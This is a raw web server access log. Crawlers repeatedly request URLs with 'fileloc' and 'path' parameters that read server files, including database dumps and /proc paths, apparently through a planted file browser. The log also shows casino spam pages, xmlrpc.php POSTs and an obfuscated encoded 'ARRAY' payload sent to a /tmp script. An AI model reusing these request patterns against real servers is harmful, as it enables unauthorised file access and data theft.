216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fphp71 HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Focart2%2Flanguages HTTP/1.1" 200 2915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Fuserspice.sql&path=%2F%2Fvar%2Fsoftaculous%2Fuserspice HTTP/1.1" 200 11785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fphp82 HTTP/1.1" 200 2936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fedit.php&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 5784 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Fphp56 HTTP/1.1" 200 2901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Fphp56 HTTP/1.1" 200 2872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:49 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Fimpleo.sql&path=%2F%2Fvar%2Fsoftaculous%2Fimpleo HTTP/1.1" 200 2842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:50 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Ftotp_requirements.php&path=%2F%2Fvar%2Fsoftaculous%2Fuserspice HTTP/1.1" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:50 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fomp%2Fphp56 HTTP/1.1" 200 2970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:51 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fphp53 HTTP/1.1" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:51 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fphp81 HTTP/1.1" 200 2897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:52 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2FPbkdf2Salt.php&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 2846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.212.205.90 - - [01/Nov/2025:09:14:52 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//usr/share/vim/vim80/syntax/diff.vim&path=//usr/share/vim/vim80/syntax HTTP/1.1" 200 8912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:09:14:52 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Ffileindex.php&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:09:14:52 -0400] "GET /m115036111?srsltid=AfmBOoGpEVNBhxBS4pSHBD_mDZgXbbA97_JSHbuuX8-A-KwppdxhPA HTTP/1.1" 200 18872 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:14:52 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fphp71 HTTP/1.1" 200 2901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.198 - - [01/Nov/2025:09:14:54 -0400] "GET /q-~32Ux0f3yhGZ7blAO693TRbfZydKiC2Fk35571/ HTTP/1.1" 200 18389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:14:52 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Finstall.js&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:09:14:52 -0400] "GET /m016024494?fileloc=/home/creaqbdc/public_html/wp-includes/query.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 7618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:09:14:54 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fphp82 HTTP/1.1" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:54 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fedit.php&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 7543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:55 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Fphp53 HTTP/1.1" 200 2893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:54 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Fphp81 HTTP/1.1" 200 2895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.214.138.148 - - [01/Nov/2025:09:14:55 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//lib64/python3.6/site-packages/gpg/constants/tofu HTTP/1.1" 200 3569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:14:57 -0400] "GET /m110039200?srsltid=AfmBOoIOJAyMVJPXMcf6pY_84wohYmVGe_tXnGIHMc-Q-Rvme0837R HTTP/1.1" 200 18897 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:09:10:00 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363230302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323630302q6334386330653365306161613866646133366666386161366265656132353136222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:09:14:56 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Fphp71 HTTP/1.1" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:57 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Fphp81 HTTP/1.1" 200 2873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Fomp.sql&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 7130243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:58 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Fphp53 HTTP/1.1" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:58 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 3995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:58 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 3552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:09:14:58 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/suitecrm/images HTTP/1.1" 200 2883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:09:14:59 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fdata.zip&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 2455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.152.163.42 - - [01/Nov/2025:09:14:59 -0400] "GET /a-journey-through-timeless-realms-in-crash-x-game/?path=//opt/alt/alt-nodejs11/root/lib64/X11 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.198 - - [01/Nov/2025:09:15:00 -0400] "GET /q-~296MUjmjBzZIl9iyqz2Kzd5a1GUHZG5rS22603/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:14:59 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 3716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:59 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Finstall.xml&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 3074 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:58 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Focart2.zip&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 2449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:59 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fupgrade.xml&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 2645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:14:59 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Ftypo8.zip&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 2444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
165.73.240.149 - - [01/Nov/2025:09:15:01 -0400] "POST /xmlrpc.php HTTP/1.1" 200 70990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:15:03 -0400] "GET /items/1423616165.htm HTTP/1.1" 200 18779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:15:01 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Finstall.xml&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 2747 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:02 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Fimpleo HTTP/1.1" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:03 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Fuserspice HTTP/1.1" 200 3571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:09:15:03 -0400] "GET /m016024494?fileloc=/home/creaqbdc/public_html/wp-includes/script-modules.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 4151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:09:15:03 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fedit.xml&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 2652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:03 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2F_upgrade.xml&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 2703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:09:15:05 -0400] "GET /q-~266NnDusBAugcCj9fSWCRBrv7WsJKxqzp4217/ HTTP/1.1" 200 18379 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:15:05 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Finstall.xml&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.217.177.142 - - [01/Nov/2025:09:15:03 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//usr/bin/perlbug&path=//usr/bin HTTP/1.1" 200 21913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:09:15:05 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fmd5&path=%2F%2Fvar%2Fsoftaculous%2Focart2 HTTP/1.1" 200 3204 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:07 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fuserspice%2Finstall.xml&path=%2F%2Fvar%2Fsoftaculous%2Fuserspice HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:08 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2F.htaccess&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:05 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fedit.xml&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 2656 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
165.73.240.149 - - [01/Nov/2025:09:15:07 -0400] "POST /xmlrpc.php HTTP/1.1" 200 70993 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:09:15:06 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fadmidio%2Finfo.xml&path=%2F%2Fvar%2Fsoftaculous%2Fadmidio HTTP/1.1" 200 3751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:06 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fimpleo%2Finstall.xml&path=%2F%2Fvar%2Fsoftaculous%2Fimpleo HTTP/1.1" 200 2765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.197.179.242 - - [01/Nov/2025:09:15:08 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
216.73.216.11 - - [01/Nov/2025:09:15:08 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Fupgrade.xml&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:09:15:09 -0400] "GET /m199026165?fileloc=/home/creaqbdc/public_html/wp-includes/atomlib.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:09:15:09 -0400] "GET /q-~60A6GwoTUHWoZb8pga95OoOeY50O8act2411/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
18.207.79.144 - - [01/Nov/2025:09:15:07 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib/firmware/nxp/sr150_fw.bin&path=//lib/firmware/nxp HTTP/1.1" 200 2963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:09:15:09 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Fedit.xml&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:08 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Ftypo8%2Fmd5&path=%2F%2Fvar%2Fsoftaculous%2Ftypo8 HTTP/1.1" 200 6862 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:09:15:08 -0400] "GET /doc/first_timer_badge.png?fileloc=%2F%2Fvar%2Fsoftaculous%2Fomp%2Fdata.zip&path=%2F%2Fvar%2Fsoftaculous%2Fomp HTTP/1.1" 200 2442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.234.206.30 - - [01/Nov/2025:09:15:12 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//opt/alt/alt-nodejs10/root/usr/share/locale/tum HTTP/1.1" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:15:13 -0400] "GET /q-~169U5mxkvKIa8KkOZBDmIJzBgPWO84Cnn22438/ HTTP/1.1" 200 18990 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:09:15:13 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/flatboard/images HTTP/1.1" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:09:15:15 -0400] "GET /m029037101?fileloc=/home/creaqbdc/public_html/wp-includes/rewrite.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 8576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.225.45.252 - - [01/Nov/2025:09:15:16 -0400] "GET /a-wild-ride-through-digital-dimensions-in-turbo/?fileloc=//proc/sys/net/ipv4/tcp_syn_retries&path=//proc/sys/net/ipv4 HTTP/1.1" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:15:18 -0400] "GET /casino-british-free-spins-code/ HTTP/1.1" 200 19915 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:15:18 -0400] "GET /m269014613?fileloc=/home/creaqbdc/public_html/wp-includes/class-http.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.207.89.138 - - [01/Nov/2025:09:15:20 -0400] "GET /book-of-ra-magic-kostenlos-spielen-ohne-anmeldung/?path=//opt/alt/tests/alt-php80-pecl-psr_1.2.0-1.el8 HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.188.200.18 - - [01/Nov/2025:09:10:21 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363232312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323632312q3862643931353336373936623363333162313837303039613062633764653836222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
